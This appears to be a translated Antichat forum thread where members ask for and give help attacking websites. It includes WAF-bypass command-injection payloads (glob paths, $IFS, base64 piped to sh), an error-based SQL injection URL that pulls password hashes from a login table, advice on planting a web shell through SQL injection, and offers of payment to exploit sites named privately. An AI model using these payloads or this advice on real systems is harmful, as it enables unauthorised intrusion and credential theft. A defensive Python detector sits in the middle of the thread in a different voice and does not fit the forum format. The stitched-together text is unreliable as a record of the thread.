Your questions about vulnerabilities.

Discussion in 'Vulnerabilities' started by +, 27 Apr 2015.

  1. Gorbachev

    Gorbachev Active Member

    Joined:
    23 Mar 2017
    Messages:
    246
    Likes Received:
    114
    Reputations:
    58
    Well, actually, it's about system commands there, not PHP RCE )
     
  2. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    453
    Likes Received:
    80
    Reputations:
    20
    What can I use to find NoSQL Injection? Can Burp's scanner do it? Are there extensions for it?
     
  3. kacergei

    kacergei Member

    Joined:
    26 May 2007
    Messages:
    210
    Likes Received:
    67
    Reputations:
    0
    Can anyone advise on this question?
    PS: In which section can I post a request of the "help with SQLi" kind? I'll chip in for beer(
    I haven't seen topics like that in the services section(
     
  4. hibar1Xs

    hibar1Xs Member

    Joined:
    30 Jan 2019
    Messages:
    9
    Likes Received:
    5
    Reputations:
    3
    • Fragmented SQL injections
    • HTTP Parameter Pollution
    https://www.ptsecurity.com/upload/corporate/ru-ru/analytics/PT-devteev-CC-WAF.pdf
    https://www.ptsecurity.com/upload/c...s/Ю.Гольцев_Уязвимости_web_сложные_случаи.pdf
     
    kacergei and BillyBons like this.
  5. man474019

    man474019 Member

    Joined:
    31 Jul 2015
    Messages:
    256
    Likes Received:
    73
    Reputations:
    1
    hi all
    OS command injection in POST data, mod_sec WAF... when I try echo test, it works,
    but when I try uname, ls, pwd, dir the WAF deletes the command. What real advice is there?
     
  6. crlf

    crlf Members of Antichat

    Joined:
    18 Mar 2016
    Messages:
    498
    Likes Received:
    894
    Reputations:
    314
    Hi, try this:
    Code:
    /b?n/?s /
    /b?n/un?m?
    /?in/e??o "bHMgLWxh" | /?sr/b?n/b??e64 -d | /b?n/?h
    
     
    dmax0fw likes this.
  7. man474019

    man474019 Member

    Joined:
    31 Jul 2015
    Messages:
    256
    Likes Received:
    73
    Reputations:
    1
    @crlf thank you for the reply, I tried these variants for reading /etc/passwd, and now I also tried your variants, but the WAF cuts the functions as well (((

     
  8. crlf

    crlf Members of Antichat

    Joined:
    18 Mar 2016
    Messages:
    498
    Likes Received:
    894
    Reputations:
    314
    It seems that there is some unknown logic on the backend, not a traditional WAF. Try to fuzz and detect the white/black sequences and build the attack vector in accordance with the circumstances. For example:

    Code:
    ;id;
    `id`
    ;sleep 100;
    `sleep 100`
    uname${IFS}-a
    echo$IFS"bHMgLWxh"|base64$IFS-d|sh
    `echo$IFS"bHMgLWxh"|base64$IFS-d|sh>log.txt`
    
    and so on...
    
    Also check this.
     
    man474019 and dmax0fw like this.
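The two crlf posts above show why a filter that merely deletes words like `uname` or `ls` is not a control: glob characters in paths (`/b?n/?s`), `${IFS}` in place of spaces, backticks and a base64-decode pipe all carry the same command past a word list. The following detector is an added example written for this thread from the defender's side; it is not code from any poster. It normalizes the obfuscations shown in the thread before matching and runs over a few constructed POST bodies (the parameter name `cmd` and the sample bodies are made up here, not taken from anyone's target).

```python
import re
import urllib.parse

# Constructed sample POST bodies: one benign, the rest using the obfuscations
# quoted in the thread. None of these come from a real request log.
SAMPLES = {
    "benign":    "name=test&msg=hello world",
    "plain":     "cmd=uname -a",
    "glob_path": "cmd=/b?n/un?m?",
    "ifs":       "cmd=uname${IFS}-a",
    "b64_pipe":  'cmd=echo$IFS"bHMgLWxh"|base64$IFS-d|sh',
    "backtick":  "cmd=`sleep 100`",
}

# Command words a naive word-deleting filter would look for.
COMMAND_WORDS = {"id", "ls", "uname", "pwd", "sleep", "cat", "sh", "base64"}
WORD_RE = re.compile(
    r"(?:^|[\s;|&`(])(" + "|".join(COMMAND_WORDS) + r")(?=$|[\s;|&`)])"
)
# A path segment containing a glob metacharacter (/b?n/?s expands to /bin/ls).
GLOB_PATH_RE = re.compile(r"/[\w?\[\]*]*[?\[*][\w?\[\]*]*")


def normalize(value: str) -> str:
    """Undo the thread's obfuscations so plain matching works again.
    ${IFS} and $IFS are the shell's field separator, i.e. whitespace."""
    return re.sub(r"\$\{IFS\}|\$IFS", " ", value)


def indicators(value: str) -> list[str]:
    """Return the names of command-injection indicators found in one value."""
    v = normalize(value)
    hits = []
    if WORD_RE.search(v):
        hits.append("shell-command-word")
    if GLOB_PATH_RE.search(v):
        hits.append("glob-in-path")
    if "$IFS" in value or "${IFS}" in value:
        hits.append("ifs-separator")
    if re.search(r"[;|&`]", v):
        hits.append("shell-metachar")
    if re.search(r"base64\s+-d", v):
        hits.append("base64-decode-pipe")
    return hits


def scan(body: str) -> dict[str, list[str]]:
    """Map each suspicious form parameter in a URL-encoded body to its indicators."""
    findings = {}
    for pair in body.split("&"):
        name, _, raw = pair.partition("=")
        hits = indicators(urllib.parse.unquote_plus(raw))  # decode %xx and '+'
        if hits:
            findings[name] = hits
    return findings
```

Each indicator fires on a different layer of the evasion, so a request that hides the word still trips the glob, separator or pipe checks; logging the indicator names rather than just blocking gives the analyst the same fuzzing picture crlf describes, from the other side.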
  9. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    1,023
    Likes Received:
    1,389
    Reputations:
    53
    And what did you expect from your command?
     
  10. xmp

    xmp Member

    Joined:
    14 Dec 2018
    Messages:
    13
    Likes Received:
    9
    Reputations:
    4
    Can someone tell me how to upload a shell via SQLi?
    union-based injection
    FILE_PRIV = Y (5.5.60-log)
    --secure-file-priv is enabled, so INTO OUTFILE doesn't work, accordingly.
     
  11. man474019

    man474019 Member

    Joined:
    31 Jul 2015
    Messages:
    256
    Likes Received:
    73
    Reputations:
    1
    hi
    see if magic_quotes_gpc is ON or OFF
    you must find a writable path/folder to upload your shell
    and you can also try LOAD DATA INFILE
     
  12. man474019

    man474019 Member

    Joined:
    31 Jul 2015
    Messages:
    256
    Likes Received:
    73
    Reputations:
    1
    Hi friends
    there is an SQLi
    Code:
    https://www.site.com/1'*updatexml(1,concat(0x3A,(select(group_concat(pass))from(mdb.login))),1)*'/services/test
    but in the output it cuts 1 symbol from the md5 hash, what can you say about this? what can I do?
    Thanks
     
  13. xmp

    xmp Member

    Joined:
    14 Dec 2018
    Messages:
    13
    Likes Received:
    9
    Reputations:
    4
    Yes, I can upload file data to a table, but I'm looking for a way to write data to a file.
    magic_quotes_gpc = off
     
  14. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    1,023
    Likes Received:
    1,389
    Reputations:
    53
    try to override it, but most likely there's no way
     
    xmp likes this.
  15. xmp

    xmp Member

    Joined:
    14 Dec 2018
    Messages:
    13
    Likes Received:
    9
    Reputations:
    4
    The setting that enables it is in /etc/my.cnf
    Am I understanding correctly that this is what you mean?

     
  16. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    1,023
    Likes Received:
    1,389
    Reputations:
    53
    https://bugs.mysql.com/bug.php?id=50373
     
    xmp likes this.
  17. WallHack

    WallHack Elder

    Joined:
    18 Jul 2013
    Messages:
    262
    Likes Received:
    97
    Reputations:
    25
    There is a vulnerability, Cross site scripting in cookies
    GET site/eta.php HTTP/1.1
    Referer: https://www.google.com/
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/45.0.2228.0 Safari/537.21
    Cookie: cache=Cross site scripting

    Is there an example of exploiting such a vulnerability?
     
  18. vladF

    vladF New Member

    Joined:
    5 Dec 2018
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Can anyone try to exploit the vulnerability by hand? It won't go in sqlmap at all, but I think it needs to be done manually. I'll send the site in a PM. I'll chip in for beer)
     
  19. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    1,023
    Likes Received:
    1,389
    Reputations:
    53
    What's the problem?
     
  20. man474019

    man474019 Member

    Joined:
    31 Jul 2015
    Messages:
    256
    Likes Received:
    73
    Reputations:
    1
    any help ??
     